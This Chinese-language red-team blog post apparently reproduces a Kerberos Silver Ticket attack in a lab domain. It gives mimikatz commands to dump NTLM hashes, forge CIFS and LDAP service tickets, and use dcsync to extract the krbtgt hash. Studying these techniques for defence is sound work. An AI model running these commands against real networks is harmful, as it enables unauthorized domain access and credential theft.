白银票据（Silver Ticket）攻击

大家好，这里是 渗透攻击红队 的第 38 篇文章，本公众号会记录一些我学习红队攻击的复现笔记（由浅到深），不出意外每天一更

白银票据

Silver Ticket（白银票据）不同与 Golden Ticket。Silver Ticket 的利用过程是伪造 TGS，通过已知的授权服务密码生成一张可以访问该服务的 TGT。因为在票据生成过程中不需要使用 KDC，所以可以绕过域控制器，很少留下日志，而 Golden Ticket 在利用过程中需要由 KDC 颁发 TGT，并且在生成伪造的 TGT 的 20分钟内，TGS 不会对该 TGT 的真伪进行校验。

Silver Ticket（白银票据）依赖于服务账号的密码散列值，这不同于 Golden Ticket 利用需要使用 krbtgt 账号的密码哈希值，因此更加隐蔽。

Golden Ticket 使用 krbtgt 账号密码的哈希值，利用伪造高权限的 TGT 向 KDC 要求颁发拥有任意服务访问权限的票据，从而获取域控制器权限。

而 Silver Ticket（白银票据）会通过相应的服务账号来伪造 TGS，例如：LDAP、MSSQL、WinRM、DNS、CIFS 等，范围有限，只能获取对应服务权限。

Golden Ticket 是由 krbtgt 账号加密的，而 Silver Ticket（白银票据）是由特定服务账号加密的。

白银票据攻击

环境

攻击者在使用 Silver Ticket（白银票据）对内网进行攻击时，需要掌握下面的信息：

• 域名
• 域 SID（就是域成员SID值去掉最后的）
• 目标服务器的 FQDN
• 可利用的服务
• 服务账号的 NTLM Hash
• 需要伪造的用户名

白银票据伪造 CIFS 服务权限

CIFS 服务通常用于 Windows 主机之间的文件共享。

在当前域用户 mary 查询域控制器的共享目录的访问权限，发现没有权限：

dir \\OWA2010CN-God\c$

在域控制器中使用 mimikatz 获取服务账号的 NTLM Hash：

mimikatz log "privilege::debug" "sekurlsa::logonpasswords"

得到的域控制器的信息：

Username : Administrator
NTLM HASH：78c403b6e04402158d26c5581f9e954b
sid:S-1-5-21-1218902331-2157346161-1782232778

在命令行环境下清空当前系统中的票据，防止其他票据对实验环境进行干扰：

klist purge

或者可以使用 mimikatz 清除票据：

kerberos::purge

查看域的 SID 值：

whoami /user

得到的 SID ：S-1-5-21-1218902331-2157346161-1782232778

之后就可以使用 mimikatz 生成伪造的 Silver Ticket 票据：（在不能访问域控制器的mary机器上执行）

kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLMHash> /user:<伪造的用户名> /ptt

kerberos::golden /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778  /target:OWA2010CN-God.god.org /rc4:78c403b6e04402158d26c5581f9e954b  /service:cifs /user:saul666 /ptt

这个时候就能访问到域控的共享目录了：

dir \\OWA2010CN-God\c$

白银票据伪造 LDAP 服务权限

使用 dcsync 从域控制器中获取指定用户的账号和密码哈希值，例如 krbtgt。

输入命令查看当前权限是否可以使用 dcsync 与与控制器进行同步：

# 命令格式
lsadump::dcsync /dc:域DC /domain:域名 /user:域用户名
# 示例
lsadump::dcsync /dc:OWA2010CN-God.god.org /domain:god.org /user:krbtgt

向域控制器获取 krbtgt 的密码哈希值失败，说明当前权限不能进行 dcsync 操作。

输入命令在域控制器中使用 mimikatz 获取服务账号的 NTLM Hash：

mimikatz log "privilege::debug" "sekurlsa::logonpasswords"

获取到的：

Username : OWA2010CN-GOD$
NTLM     : 78c403b6e04402158d26c5581f9e954b

然后为了防止其他票据对实验进行干扰，我们先清除内存中的票据：

klist purge

使用 mimikatz 生成伪造的 Silver Ticket，在之前不能使用 dcsync 从域控制器获取 krbtgt 密码哈希值的机器中输入命令：（域 mary 机器）

kerberos::golden /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:OWA2010CN-God.god.org /service:LDAP /rc4:78c403b6e04402158d26c5581f9e954b /user:saul666 /ptt

这个时候输入命令，使用 dcsync 在域控制器中查询 krbtgt 的密码哈希值：

lsadump::dcsync /dc:OWA2010CN-God.god.org /domain:god.org /user:krbtgt

Silver Ticket 还可以用于伪造其他服务，例如以下：

参考文章：

https://blog.csdn.net/weixin_45728976/article/details/105290034